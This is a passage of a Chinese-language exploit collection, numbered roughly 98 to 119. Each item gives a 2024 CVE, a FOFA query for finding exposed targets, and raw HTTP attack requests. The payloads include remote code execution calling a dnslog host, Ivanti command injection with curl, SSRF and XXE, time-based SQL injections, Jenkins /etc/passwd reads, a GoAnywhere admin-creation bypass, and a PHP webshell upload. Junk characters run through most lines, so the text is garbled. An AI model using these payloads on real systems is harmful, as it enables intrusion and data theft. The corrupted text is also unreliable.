2 E! n$ a8 a2 M+ k- _+ M* V' [Content-Length: 121/ `# h" w* r2 ~% o6 U
Accept: */*# s0 c. M" e+ _+ \
Accept-Encoding: gzip, deflate
% U6 W( o( ]3 V$ A& \. I) vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) [, T$ t2 k1 R! `9 r1 HContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( b. M/ `* \. K2 VX-Requested-With: XMLHttpRequest
1 S. j$ n* B$ r% q
- S3 X& G0 J5 b; Zid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
+ Y( Z; ~3 L' _8 _$ q f' X1 w9 D
( X* H/ ?, p7 \$ K% ~& w/ l3 m. D0 I) u3 e) |
99. Ncast盈可视高清智能录播系统busiFacade RCE
' Y; W. B% g0 V+ {$ j% U1 iCVE-2024-0305: o: A) K. D2 ` Q7 _. u' ~
FOFA:app="Ncast-产品" && title=="高清智能录播系统"" [2 y& ^" K' |. U4 A' ^( e
POST /classes/common/busiFacade.php HTTP/1.1
* ~7 o: I2 Y& A! W' f) J0 ~' t2 _Host: 192.168.40.130:8080
9 ~+ l* [$ i; l3 B/ i8 t) G; f# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% m: S& o1 ~3 E9 p3 `Connection: close
1 L8 w7 [4 c( ZContent-Length: 1546 X& w+ ~6 L4 H' M3 J" |, h- i
Accept: */*
% a( O5 a6 [1 y& i7 K) s& n; bAccept-Encoding: gzip, deflate' n( @. T4 B4 J8 F. o! m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: d2 v* p& y7 G" ]7 D- N
Content-Type: application/x-www-form-urlencoded; charset=UTF-8# ~4 t; ?+ `# ]: P8 b
X-Requested-With: XMLHttpRequest
9 J- Q: Z1 W4 ?0 @$ H/ i
8 p& q, u) a# T" O, W; ?4 X4 W%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D$ \ `& M4 D% y5 [9 d2 @1 H
0 U. W& C* k a! X, c3 m! X8 g! N
m% h/ d q, g1 S" F
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ N- u+ B$ X* }9 ~- ACVE-2024-0352
8 q. C3 W2 c% s& [( vFOFA:icon_hash="874152924"; L3 D: @1 A4 \' o2 a
POST /api/file/formimage HTTP/1.1 R* E' o& `$ m$ O: K6 f
Host: 192.168.40.130
' |7 c6 c) l) D$ y6 R1 d( z4 R6 gUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 v \) H& z+ W% b
Connection: close
: Y- g: U3 V Y" h3 {* dContent-Length: 201& z6 w; C2 M& ^% J* r* N$ @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei9 o6 a& f5 U! _9 c) ~
Accept-Encoding: gzip$ \/ c( N0 r& p6 i9 H
6 N: W; s4 J4 k: s9 s! Z------WebKitFormBoundarygcflwtei
4 I1 j3 n \4 U/ g- _- uContent-Disposition: form-data; name="file";filename="IE4MGP.php"
/ |2 r) w/ S; n8 m* gContent-Type: application/x-php' M9 y/ V& w5 k# o2 C" I
' T& |2 F: r8 v
2ayyhRXiAsKXL8olvF5s4qqyI2O; X; s+ F1 e( \ O% O
------WebKitFormBoundarygcflwtei--) e* A# O9 t. C) \% V
$ K, {+ D( ^: h: D* K
* }) J% d, I0 z) x3 }. S: ~101. ivanti policy secure-22.6命令注入' P4 m1 o3 c; K: n1 g& h
CVE-2024-21887& j. a; X$ G4 p+ x; B
FOFA:body="welcome.cgi?p=logo"
- o( V' w; O* I; rGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1 }. }1 a( } I* ]
Host: x.x.x.xx.x.x.x3 g+ r! l& u# o' P* _$ ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 k! Q! R' x G( K% s$ h5 b
Connection: close
8 o9 I& r- j9 g" n. f7 P; ?Accept-Encoding: gzip+ T* z& Y8 v4 r' U3 D3 @% z; e
4 \# X5 A9 T1 P3 C% j/ w, m* s
$ y) D0 e, m& J102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 k& K7 a; t/ w
CVE-2024-21893
/ M' S8 O1 i" R$ \FOFA:body="welcome.cgi?p=logo"* B8 Q* O0 e! j
POST /dana-ws/saml20.ws HTTP/1.1, i2 A+ n$ ~) Z0 J4 E3 o! Y+ b
Host: x.x.x.x
( ^, S9 o1 Q. J) [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 m1 [+ b* D7 v0 Q6 X, l
Connection: close8 L. [9 A3 M- e7 t
Content-Length: 792/ l, P0 k# @/ Q/ x
Accept-Encoding: gzip! e+ I6 U* I2 Q3 v6 r6 V, ^( a" J
' |/ {1 {* j! j; t' R1 g2 J<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
- b! ?$ S1 G% w/ k' R
& X. c- o2 l2 m9 {103. Ivanti Pulse Connect Secure VPN XXE
S7 D& h) h, E' K3 l, Y3 rCVE-2024-22024
' }+ i/ Y- Z$ K. a9 z- XFOFA:body="welcome.cgi?p=logo"
4 g4 Y/ s( Z' e- P; v* HPOST /dana-na/auth/saml-sso.cgi HTTP/1.1% ]3 ~/ X ^' Y$ Q& L
Host: 192.168.40.130:1114 E' H- ?: G- \
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
0 i7 G+ O. q0 @* F n7 J( A9 lConnection: close+ w& [' J2 c: ]
Content-Length: 204) j# N/ G( h X$ ?+ y0 g
Content-Type: application/x-www-form-urlencoded
* Q7 a, f+ p* ^) w" `Accept-Encoding: gzip
! s( G1 B2 I% C# Q, Q ~- T7 {! t
; I: N% ^, ^$ L* k# ISAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( @ ^+ G2 X2 R* g& n
% ~/ R9 R; j! j$ @0 ^7 _4 |7 k1 v& N- [! Y+ S- C6 D) ~
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下- Q% U1 X' p1 H
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
) I% @' i+ S7 C: r; \% X) ~7 ?
+ Z* _* t6 D1 D/ a& W( Z4 j6 U# ^, h" z& A" |1 G! A. e
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露4 ^$ ~* _, m y9 J
CVE-2024-0569
: c; Y1 @. ]( u3 r( S4 o, }FOFA:title="TOTOLINK"
) u' I' e# q# l3 h" w/ H* F, rPOST /cgi-bin/cstecgi.cgi HTTP/1.15 d* i2 H! k' B
Host:192.168.0.1
& K9 }4 R! G& `% b9 n0 KContent-Length:41
5 k' p @6 g% j$ O* |& tAccept:application/json,text/javascript,*/*;q=0.012 {7 Z2 j! T$ K4 G9 D9 X
X-Requested-with: XMLHttpRequest8 V( C4 Z" Z2 u
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
* G# C! z0 g6 Y" G& c" TContent-Type: application/x-www-form-urlencoded:charset=UTF-8* K5 q3 p: n6 z, C. H$ T
Origin: http://192.168.0.1
2 e) I, v: j: u2 T+ iReferer: http://192.168.0.1/advance/index.html?time=1671152380564
4 e h M. v! R8 R: V: F mAccept-Encoding:gzip,deflate) `* V8 _1 g) g( c
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
4 H9 L; M3 O: }$ yConnection:close- ?9 M$ v, j* u1 @' v6 y5 Z) V6 R
$ ]' u) e- Y* T! O+ @* Y9 A2 x{) f# a. x0 s5 y1 v; }5 o
"topicurl":"getSysStatusCfg",; Y% ]3 w# ?9 _" q
"token":""' [3 B) P1 f7 c0 Q9 `8 \# S5 E
}4 X6 \* A' F" h1 L
4 b Y, G7 w1 D- l
105. SpringBlade v3.2.0 export-user SQL 注入
! `9 [2 U0 K8 VFOFA:body="https://bladex.vip"
% R0 l1 p {" s7 g( m! @5 z9 Chttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=19 l- z5 `) ]4 I, i) }7 X; k! o
7 e4 J# j! k5 u# Q- C9 b1 G& s- k
106. SpringBlade dict-biz/list SQL 注入4 a2 ]( ~: Q9 Z9 i3 _' J
FOFA:body="Saber 将不能正常工作"- q# T# W3 ^( Y4 Q
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 B' C0 ~, n* ^# M N: q; s" z
Host: your-ip" J2 G- Z7 ]* o& s) C: o& \, o- J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) p. N! `$ ]+ c1 B& b; g e" h
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A, o) g2 K9 D, E" C& u2 a/ l
Accept-Encoding: gzip, deflate
2 K7 y7 l s/ A& O0 {3 I0 m' gAccept-Language: zh-CN,zh;q=0.9) t! o- t: M, F
Connection: close' i# `3 s0 @% X2 }: E
) g; U" b( n3 l3 d/ B) K
' v# i( O3 l" Q7 P2 Z+ ]107. SpringBlade tenant/list SQL 注入6 Y( R/ O, e# @8 |
FOFA:body="https://bladex.vip"
& P5 l4 P. e7 k7 p. p) b9 cGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.19 o- T" A1 {5 w+ ~
Host: your-ip
- ]1 ^# g- b$ z# f( y2 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 A3 V6 |8 ?! a, @0 F* k, Q8 b
Blade-Auth:替换为自己的0 t7 r0 |6 F1 h7 d j$ d
Connection: close
8 R }8 p: w: |6 K2 W R
! _( d, t( Y) n) W, \1 H$ a$ J6 h5 c
108. D-Tale 3.9.0 SSRF/ Z q; u$ K0 Q6 ~
CVE-2024-216422 F D6 O4 ]/ v
FOFA:"dtale/static/images/favicon.png"
; g9 A& K7 b) @$ k) XGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
3 j% a4 n) n# jHost: your-ip0 ]* I& l* U, z2 t3 Y: e! e D
Accept: application/json, text/plain, */*
4 s& }0 t, s' d- QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 ~- f% Q8 J* E3 }% ~! g: |
Accept-Encoding: gzip, deflate
& t( I0 \. D% T: LAccept-Language: zh-CN,zh;q=0.9,en;q=0.86 B& |) z1 L- t" h
Connection: close% ~% S4 e. V* O. o3 t
8 \ n5 p4 H# [2 T& |7 {, k- T4 O9 I. M
109. Jenkins CLI 任意文件读取
5 M3 U" H0 B6 Z ]5 X6 L& M: _CVE-2024-23897+ T; m7 K( K$ W0 c
FOFA:header="X-Jenkins"
6 S) O9 ^0 P2 Y9 D9 p& sPOST /cli?remoting=false HTTP/1.11 L& n- X H$ q4 O' Z4 ^
Host:0 W1 g" t. h7 a! u' d
Content-type: application/octet-stream1 i( L: e7 ]4 g V: |: r; |
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92, g; s' S$ X! q. c( q5 O
Side: upload& I2 v" A7 g6 W6 n3 K2 q
Connection: keep-alive
) ~3 u' E2 J. [/ ]. m. j% R$ SContent-Length: 163
8 ?1 ^3 X' U K6 Z
& t+ Z- ^, a. ub'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
+ Z7 K8 C( ?; E7 g; t9 J, A: A1 i. B: Y
& Q9 r3 F' @+ X8 M9 mPOST /cli?remoting=false HTTP/1.1$ w: l1 F( X) k2 ~7 ?7 z
Host:
# n; I- t: ]; R( h% u. }9 G5 t uSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e920 m& V) ~! K7 w* m
download$ j' n( U+ [( k5 v& [ x
Content-Type: application/x-www-form-urlencoded) z. I3 H( T5 h4 K3 v8 ^
Content-Length: 0
) E& {, p0 v/ L2 i
0 \' K, {9 c7 H- B( e; A
; Q( x& y B' t* p/ M" U) eERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
* W. y8 U) f" r3 J$ wjava -jar jenkins-cli.jar help+ ^1 L9 G/ g& G9 d# @, j
[COMMAND]! V# g$ ], H. n& ~- Q( `7 }
Lists all the available commands or a detailed description of single command.$ H: r/ |6 B6 v, F) g
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)" g( D& B! o! d
" }0 W5 q2 q$ K/ `
0 x$ {; F# P$ u110. Goanywhere MFT 未授权创建管理员4 E9 o# @; M2 V8 L
CVE-2024-0204! j7 G: O6 r7 V. c
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
+ ^8 S' O. @$ p4 qGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 W# f9 C' j0 {9 \Host: 192.168.40.130:8000# c3 Q2 ^& Z* Y. t i
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36) }' P7 l1 Z; f. ]6 t
Connection: close
- x; r' h7 k" r8 T8 ?Accept: */* f5 C9 n7 b# D* m1 Y6 H6 u( Y
Accept-Language: en! j& G9 n3 Q/ S) i+ J
Accept-Encoding: gzip
+ y) v0 V$ @1 e7 ~, }* K+ } Z5 C% J K: T: H
, C# L! |- b9 u& K
111. WordPress Plugin HTML5 Video Player SQL注入
% l, |" i6 l ^2 e" s! Q: RCVE-2024-1061
9 U2 M& R& d# l( X% @" e& {FOFA:"wordpress" && body="html5-video-player"' z( x2 t+ m% D( ^
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1) g- u1 s& v+ |* X
Host: 192.168.40.130:112
6 ~* u: X3 J- V- L' W! v( v& q1 _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" D* z3 Z* M4 e I5 zConnection: close
3 c& j: S7 D. P" tAccept: */*+ H Y- i+ H8 }/ e4 N9 }
Accept-Language: en
* P1 \# Q7 F& IAccept-Encoding: gzip1 Z$ g6 ?# d% d& Q. e: q7 J
: n1 d2 Y2 R/ `9 a# x. j
; _6 U+ z: R, d F |* ?112. WordPress Plugin NotificationX SQL 注入
3 M D! ~: ^' L; f Z; ZCVE-2024-1698
( b& P9 ]) r3 C! SFOFA:body="/wp-content/plugins/notificationx"
' ^; `: L8 k0 V) L! C# T, OPOST /wp-json/notificationx/v1/analytics HTTP/1.1: i' C2 S. z0 t4 a
Host: {{Hostname}}
7 I6 r/ W: N! Q6 EContent-Type: application/json
2 x$ {) u+ s. C/ T2 r1 d' F# P7 ~7 }1 l
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
' |" x% Z0 H$ J9 L2 n& T4 g; v) y# h! F: v+ G: f% T! q* O" `* T* k) g' D
% v3 i& C* A- ~6 w! g113. WordPress Automatic 插件任意文件下载和SSRF
% M3 t* z. F6 S8 SCVE-2024-27954. U5 V: f( ^9 p+ C
FOFA:"/wp-content/plugins/wp-automatic"
( f& L7 [) k( xGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
7 a: |: s- p$ r" _( q" ~5 ]Host: x.x.x.x* Z- l9 ^* ?& _8 u! c7 C7 f! e8 [
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; r' t% n+ n- D" O- h3 o
Connection: close
% z% {. O( \3 Z6 f* T2 O8 c9 _ MAccept: */*
. m4 v4 G' f! v: b) T' hAccept-Language: en
/ F! C" d" x/ f& Y D% GAccept-Encoding: gzip- I. j- H5 u" u
+ {' f5 x; g$ j. A5 r! z C/ e) R. M9 U) F' Q9 M2 }; q
114. WordPress MasterStudy LMS插件 SQL注入- x* P3 }4 F3 v- W# j
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
3 e+ v' t- L2 q, W2 a8 SGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
; g% z6 p8 a* f! j n& ?* [Host: your-ip1 R, N: X& l2 X. C# z; y% S
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. l( ]: y: u8 h. ]4 p2 C) {
Accept-Charset: utf-8
; u4 t9 J/ o8 e/ W0 FAccept-Encoding: gzip, deflate) H# I* }9 Y+ d! _, Y/ @- s6 H
Connection: close/ X7 r$ L3 t+ z9 Z/ x* |" D" n
, {$ s( O/ z& w4 }1 S1 p4 @ @ Y+ a& G% Q( P! X/ z$ o" n
115. WordPress Bricks Builder <= 1.9.6 RCE
% B: p% o$ n* p2 W- @6 f# yCVE-2024-256002 [% M3 T3 @ O8 t1 C3 A
FOFA: body="/wp-content/themes/bricks/"' v- I2 e& V V7 }, @
第一步,获取网站的nonce值
+ I5 A+ I1 V" K, i2 G& l/ mGET / HTTP/1.1, Q' f6 w0 q* ~# l) t$ F ^9 l
Host: x.x.x.x
\/ ~$ S5 ~9 T- }. {User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. c3 S9 r- z8 L2 T) v
Connection: close# }" k l' M3 }, |
Accept-Encoding: gzip
5 n5 E% P) z+ x8 t' @; z, K4 N! D4 u( E
2 ]' ]' R* r! W8 F6 }3 I
第二步替换nonce值,执行命令
5 z5 o- g7 @! n3 _$ KPOST /wp-json/bricks/v1/render_element HTTP/1.1 J2 f4 E/ p. I& C9 P/ p5 ^4 {
Host: x.x.x.x
1 q! C. V/ Q* B* S( @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ K3 [$ y' q0 U# C! ]Connection: close
4 H8 t L0 M, ~! e8 f7 x2 v9 PContent-Length: 356
; ^7 ^0 O8 O) n4 ~& SContent-Type: application/json4 ~* x4 M; p8 E% _5 S0 N
Accept-Encoding: gzip
& @, A+ g& r% N" v
/ F& g9 j- o" N2 ?{: g8 y+ R* `0 Q \4 j1 [0 s
"postId": "1",
' |" G4 y" L4 y0 A! L0 A. _ "nonce": "第一步获得的值",; S1 X" Q* {, L1 }# [
"element": {5 I2 z% h* ]3 ]: Z; t& `+ K3 x* l
"name": "container",$ |6 N1 x" }+ u; O& E( F- k, E
"settings": {
: t4 |" N) ? I, ]1 a" U "hasLoop": "true",- Y) O$ ^6 H4 s4 q* f- _3 H: t# p
"query": {
1 M; T3 V. |5 M* c "useQueryEditor": true,7 F2 g" Y6 j, T, p
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
. T* \0 `9 m# P: r4 b "objectType": "post"
/ ^3 c$ }3 J2 @: J; Y7 m( I }
8 D. `4 A5 B) G' X2 O* I" W }" a+ w; G; ~, U8 A' D) R
}
8 K' l, n5 ^% q+ j- Y}
; D, j. }! S C
6 ~# ^* F$ W; R; [( Z; p* i) w% F# u4 o& E$ v8 K1 }
116. wordpress js-support-ticket文件上传
. V7 b( H" n: _: F. Q" hFOFA:body="wp-content/plugins/js-support-ticket"
# Y6 o7 N8 u* C/ }8 {" }POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1) r( [- [2 O f& t! u5 c J- v
Host:
) ~, d8 u0 V9 l" \# `8 BContent-Type: multipart/form-data; boundary=--------7670991715 y0 S& B9 U: s
User-Agent: Mozilla/5.0
' Z7 i2 H# H( x+ K" w0 A$ S3 m2 G8 \9 J- [) s1 ?
----------767099171
5 D" P$ g5 i/ L9 x, F* dContent-Disposition: form-data; name="action"! X* T9 g w( }8 M1 y, b5 V) ~
configuration_saveconfiguration
0 l' N# A( S/ f, _- [, q$ N) _2 w2 P----------767099171
: i* V3 x, z! W' NContent-Disposition: form-data; name="form_request"
( ?2 R" _; `* z A% wjssupportticket
l3 h2 h- p0 f4 T2 ]----------767099171
& @) |- H. q1 p' g( D6 cContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"( P; w& P. r$ v; n2 N
Content-Type: image/png
4 O4 B# S% }9 ?# b/ W0 ^ T----------767099171--
+ [& J& k# P$ k# G+ |2 _0 @' |/ B+ ^! I9 @5 u7 v8 }
+ q- p9 [1 A. B9 L9 R& y5 q( S! e# J! l/ W
117. WordPress LayerSlider插件SQL注入
% y1 q2 c; `% F* |, j* W5 Cversion:7.9.11 – 7.10.06 ^+ C5 q6 i( }) C8 a7 \) K8 o
FOFA:body="/wp-content/plugins/LayerSlider/"
u& |% R4 ~& k& J" t. s3 ~7 d8 B; XGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1, L& p8 T6 C$ c6 i! @% C4 o
Host: your-ip
: v$ K. k, W, y4 U4 I0 G% dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* |5 c* a2 M' }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- C, m) [, V# Z3 i0 P7 n" S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 [" ?/ p" d; y+ g5 q
Accept-Encoding: gzip, deflate, br$ T2 ]& `5 @" T$ `: E& G
Connection: close
# d/ Z2 f% |. T [) ]: XUpgrade-Insecure-Requests: 1
8 I- ?# G, Q4 k d. K }+ f) K# U$ i8 N& \# p9 i
5 O! ]4 L: D7 H. q! t$ \6 O) R' I. R118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ q" c2 G! \% v2 ZCVE-2024-0939
- w( ]/ q, L$ j4 dFOFA:title="Smart管理平台"$ y& A! \0 U" g% t+ u
POST /Tool/uploadfile.php? HTTP/1.1
7 `1 G0 u3 O& s( o0 yHost: 192.168.40.130:8443
5 z ^; y/ `: a) M5 _9 uCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f86 R1 y& H' f0 `. ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.08 C6 T R" g2 p$ ?5 _, l( R0 ~1 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 r: D( b4 @ u0 Z) o2 j% m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ [! ^$ l5 V) ]% u' V. sAccept-Encoding: gzip, deflate0 S, a) z& i$ r4 R! \
Content-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828871 R+ `* b! q2 f7 G
Content-Length: 405
$ P* h2 |* Z5 N$ OOrigin: https://192.168.40.130:8443" s: U8 j" Z% `- k2 L% A5 a x
Referer: https://192.168.40.130:8443/Tool/uploadfile.php. s1 \* A3 v6 ^6 |# Z; O0 a5 k
Upgrade-Insecure-Requests: 1
: j, X5 k) k; o0 C1 N4 h6 uSec-Fetch-Dest: document8 L+ Y4 O) C0 d
Sec-Fetch-Mode: navigate& Q+ W% |! V8 K8 J w. Q
Sec-Fetch-Site: same-origin
3 o2 N4 K7 F+ S+ z& YSec-Fetch-User: ?1+ `7 x1 N3 S+ l& O6 s# Z% C
Te: trailers$ y& w4 }4 G! d( M' c0 v$ i; G
Connection: close
) }( g4 ?! q* T: f- }+ E4 r; S" b. z6 N6 c, x6 G
-----------------------------13979701222747646634037182887
# L; A9 ~( `+ F4 @7 HContent-Disposition: form-data; name="file_upload"; filename="contents.php"
8 g" W) w* ~0 P3 uContent-Type: application/octet-stream0 V! q% a1 E9 i
$ u! J# y! c9 w' k' T# |9 S! o
<?php
$ I3 A" y" ^! M$ W+ `. P6 rsystem($_POST["passwd"]);
- O A0 r* L" E7 S; d i! p?>0 x8 U9 |* v T( q* u
-----------------------------13979701222747646634037182887* b3 b3 S- {# P V" @& W* W4 s
Content-Disposition: form-data; name="txt_path"
; G& q6 p8 w, n- e: {/ Z
& e$ p+ d1 n, ]/home/src.php/ _% B1 P$ K- C: U6 E: G
-----------------------------13979701222747646634037182887--3 a9 L- t: |: s/ I9 C# P* K
+ X" J3 F. \: o1 F" R! M# T, z% x8 Y: A/ X# e1 f# f- H
访问/home/src.php8 Z) s6 `) | M7 C% i
( a- j4 }3 F; x: F7 Z% T; W119. 北京百绰智能S20后台sysmanageajax.php sql注入2 J, D' `, l' q4 o- M
CVE-2024-12541 ^6 S* f; r0 d2 C; V
FOFA:title="Smart管理平台"- N4 n( Z5 q5 k% ~
先登录进入系统,默认账号密码为admin/admin
2 G: h0 M1 a& v8 V6 DPOST /sysmanage/sysmanageajax.php HTTP/1.11, n. K! ~4 d4 L, a/ b3 A7 T
Host: x.x.x.x
' ]2 \ f% X) c" hCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee! z% I M7 P- e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* w9 J' y* A- B% Y% \Accept: */*
' H/ O9 w( \; M) [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 U1 J3 F5 N2 K: C
Accept-Encoding: gzip, deflate
! r) A# x4 O, c4 k2 u* Z! ]Content-Type: application/x-www-form-urlencoded;
( A: o @& l2 @- W& ZContent-Length: 109
6 h( k& E( F( g9 O- uOrigin: https://58.18.133.60:8443
, d" f/ y! U6 w4 ~: MReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
% ?- @' w1 M; V" c( @Sec-Fetch-Dest: empty' q2 _ o+ [! f
Sec-Fetch-Mode: cors2 P3 o: V! w! u3 U6 L
Sec-Fetch-Site: same-origin% p& Y) c! `8 o% x Y( E- Q1 N% f
X-Forwarded-For: 1.1.1.1
0 d% R) Z) H* W' U5 lX-Originating-Ip: 1.1.1.1
7 G9 [, m+ q" q. k4 ^( a$ OX-Remote-Ip: 1.1.1.1
